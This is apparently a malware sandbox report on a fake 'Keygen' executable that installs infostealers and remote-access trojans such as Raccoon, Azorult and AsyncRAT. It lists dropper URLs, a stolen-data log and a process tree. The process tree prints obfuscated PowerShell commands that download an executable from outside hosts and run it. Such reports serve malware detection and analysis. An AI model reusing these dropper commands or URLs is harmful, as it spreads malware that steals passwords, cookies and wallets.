Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (2) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:34:12 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (458 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (2) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (2) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7E73.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (2) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1040
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7E73.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1948
          • C:\Users\Public\ofh.exe
            "C:\Users\Public\ofh.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2552
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2776
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2228
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2228 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\180663160318948\\* & exit
                  8⤵
                    PID:2900
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2228
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2904
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2808
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:684
              • C:\Users\Public\ofh.exe
                "C:\Users\Public\ofh.exe"
                6⤵
                • Executes dropped EXE
                PID:2840
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7E73.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1804
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7E73.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1956
            • C:\Users\Public\lwz.exe
              "C:\Users\Public\lwz.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2472
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2500
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:340
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2944
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2240
